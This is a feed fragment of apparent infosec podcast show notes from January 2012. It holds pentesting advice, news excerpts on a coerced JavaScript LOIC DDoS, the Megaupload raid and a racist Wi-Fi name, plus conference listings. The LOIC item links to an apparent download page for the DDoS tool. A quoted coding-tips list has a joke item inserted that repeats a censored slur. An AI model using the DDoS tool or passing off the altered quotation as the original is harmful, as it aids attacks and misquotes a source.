<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span> </span><span>https://twitter.com/pentestlessons</span></a><span>.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 1: </span><span>Don&rsquo;t assume that your client has any idea what you do. &nbsp;Don&rsquo;t assume they aren&rsquo;t interested in hearing about it though. &nbsp;Every time you are talking to the customer, you are representing the company. &nbsp;Educating the client is a great way to build business relationships.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 2:</span><span> &nbsp;Stay within your scope: if you&#039;ve been hired to audit or test &#8211; don&#039;t fix anything.</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>In my reckless youth I popped a box that had a virus on it. &nbsp;I thought I&#039;d be a superhero and remove the virus so I could laugh about it during my report presentation. &nbsp;Instead the machine locked up, and 300 Kilometres away I could FEEL it&#039;s blue screen. Yeah, it was the company&#039;s payroll server.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 3:</span><span> &nbsp;Depending on your engagement agreement, if you fuck up something really important (like a payroll system), don&#039;t wait long before reporting it.</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Lesson 4:</span><span> If you are doing an audit which consists mostly of interviews, actually perform the interview. Don&rsquo;t go into tangents and stories. It is an interview after all. Ask them to explain their job functions, what they do on a day to day basis, and what types of challenges they run in to. #SoShowMeOrFuckYou</span></b></p>
<p><b><br />
		</b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://www.wired.com/threatlevel/2012/01/anons-rickroll-botnet/"><span>http://www.wired.com/threatlevel/2012/01/anons-rickroll-botnet/</span></a></b></p>
<p><b><br />
		<span>A version of Anonymous&rsquo; </span><a href="http://cybercrime.hostzi.com/Ym90bmV0/loic/"><span>voluntary botnet software, known as LOIC (Low Orbit Ion Canon)</span></a><span>, was modified to make it not so voluntary, drafting unwary bystanders, journalists and even anons who don&rsquo;t support DDoS tactics into attacks on the U.S. Justice Department. Thursday&rsquo;s trickery seems not to have been central to the successful takedown of sites like justice.gov, RIAA.com and MPAA.com, but not all anons are pleased with forcing unwitting bystanders to join in a potentially illegal action.</span></b></p>
<p><b><span>The trick snagged those who happened to click on a shortened link on social-media services, expecting information on the ongoing #opmegaupload retaliation for the U.S. Justice Department&rsquo;s takedown of popular file sharing site Megaupload. Instead they were greeted by a Javascript version of LOIC &mdash; People were already firing packets at targeted websites by the time their page was loaded.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.reuters.com/article/2012/01/21/us-internet-piracy-megaupload-idUSTRE80K07Q20120121"><span>http://www.reuters.com/article/2012/01/21/us-internet-piracy-megaupload-idUSTRE80K07Q20120121</span></a></b></p>
<p><b><br />
		<span>A police official said dozens of officers, backed by helicopters, forced their way into the mansion, nestled in lush, rolling farmland, after Dotcom refused them entry, a scene more reminiscent of a high-octane spy drama than the usual policeman&#039;s lot in rural New Zealand.</span><br />
		<span>&quot;Despite our staff clearly identifying themselves, Mr Dotcom retreated into the house and activated a number of electronic-locking mechanisms,&quot; said Detective Inspector Grant Wormald from the Organised and Financial Crime Agency New Zealand.</span><br />
		<span>Officers broke the locks and Dotcom barricaded himself into a safe room which officers had to cut their way through to gain access. </span><br />
		<span>&quot;Once they gained entry into this room, they found Mr Dotcom near a firearm which had the appearance of a shortened shotgun,&quot; he said. &quot;It was definitely not as simple as knocking at the front door.&quot;</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135"><span>http://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135</span></a></b></p>
<p><b><br />
		<span>A bigot named their WiFi signal &ldquo;F&#8212; All Jews and N&#8212;-&rdquo; &mdash; and now cops are investigating.</span></b></p>
<p><b><span>The hateful signal I.D. popped up on the IPHONE of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.</span></b></p>
<p><b><span>The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 miles outside New York City.</span></b></p>
<p><b><span>The Teaneck Police Department Juvenile Bureau and the Bergen County Prosecutor&#039;s Office Computer Crime Unit are investigating it as a &quot;possible bias crime,&quot; Wilson said.</span></b></p>
<p><b><span>Source:</span><span> </span><a href="http://thenextweb.com/dd/2012/01/21/7-ways-to-start-learning-how-to-code-right-now-for-free/"><span>http://thenextweb.com/dd/2012/01/21/7-ways-to-start-learning-how-to-code-right-now-for-free/</span></a></b></p>
<p>&nbsp;</p>
<h3><b><span>1. Processing</span></b></h3>
<p><b><span>2. Codeacademy</span><br />
		<span>3. Bloc (Ruby)</span><br />
		<span>4. Get Physical</span><br />
		<span>5. Start with HTML</span><br />
		<span>6. Grab your iPAD, connect to </span><span>F&#8212; All Jews and N&#8212;-&rdquo; and then </span><span>throw it in a lake.</span><br />
		<span>7. Read, Watch and Fail</span></b></p>
<p><b><span>Source:</span><span> </span><a href="http://www.dontclickshit.com/"><span>http://www.techdirt.com/articles/20120120/14472117492/mpaa-directly-publicly-threatens-politicians-who-arent-corrupt-enough-to-stay-bought.shtml</span></a></b></p>
<p><b><span>Reinforcing the fact that Chris Dodd really does not get what&#039;s happening, and showing just how disgustingly corrupt the MPAA relationship is with politicians, Chris Dodd went on Fox News toexplicitly threaten politicians who accept MPAA campaign donations that they&#039;d better pass Hollywood&#039;s favorite legislation&#8230; or else:</span></b></p>
<p><b><span>&quot;Those who count on quote &#039;Hollywood&#039; for support need to understand that this industry is watching very carefully who&#039;s going to stand up for them when their job is at stake. Don&#039;t ask me to write a check for you when you think your job is at risk and then don&#039;t pay any attention to me when my job is at stake,&quot;</span></b></p>
<p><b><span>This certainly follows what many people </span><span>assumed</span><span> was happening, and fits with the anonymous comments from studio execs that they will stop contributing to Obama, but to be so blatant about this kind of corruption and money-for-laws politics in the face of an extremely angry public is a really, really, </span><span>really</span><span> tone deaf response from Dodd. </span></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-574-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3404/0/infosec-daily-podcast-episode-574.mp3" length="24291512" type="audio/mpeg" />
		<itunes:duration>0:50:36</itunes:duration>
		<itunes:subtitle>&#160;
Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
&#160;
Guests: aricon, coolacid, connection, [...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 574 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 574 for January 21, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.
&#160;
Guests: aricon, coolacid, connection, and spridel
&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on your tool while walking and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

		Information Security Blogger Awards 2012
		Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
CampusCon 2012
		When: January 21, 2012
		Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#039;s Road
		http://campuscon.hackingwit.com
		(from Baconzombie)
New England InfoSec Tweetup
		When: January 21, 2012
		Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
		http://neistu3.eventbrite.com/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code:
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
Schmoocon Epilogue
		When: After Schmoocon
		Where: Washington, DC
		Hit up anyone in NOVA Hackers
		http://shmooconepilogue.eventbrite.com/
Metasploit Framework Unleashed Cincinnati
		When: February 11, 2012.
		Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
		https://msfucincy.wordpress.com/
		$20 donation for #HFC
Social Engineering Training with Chris Hadgany
		When: March 5-9, 2012
		
		Where: Seattle, Washington
		When: July 21-24, 2012
		
		Where: Black Hat Vegas
		When: August 20-24, 2012
		Where: &#160;Bristol, UK
		When: &#160;November 12-16, 2012
		
		Where: &#160;Columbia, MD
		http://www.social-engineer.com/social-engineer-training
BSides Chicago
		
		When: Saturday, April 28th, 2012
		
		Where: Volcano Room (further info coming)
		Cost: Free (as always!) &#8211; Registration opening soon!
		http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
		They&#8217;re looking for sponsors, so if you know someone, pass it on.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		Huntington, West Virginia
		http://aide.marshall.edu
		CFP now open!
LayerOne 2012
		When: May 26-27, 2012
		Where: Clarion Hotel &#8211; Anaheim, CA
		http://www.layerone.org
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;Septembe[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 573 &#8211; Good Riddance SOPA/PIPA, Young Love, Shallow Talent Pool, IPv6 For Real &amp; Bad Guy’s Google</title>
		<link>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google</link>
		<comments>http://www.isdpodcast.com/episode-573-good-riddance-sopapipa-young-love-shallow-talent-pool-ipv6-for-real-bad-guys-google#comments</comments>
		<pubDate>Sat, 21 Jan 2012 06:05:57 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3402</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 573 for January 20, 2012. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.22352913008488395" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 573 for January 20, 2012. &nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
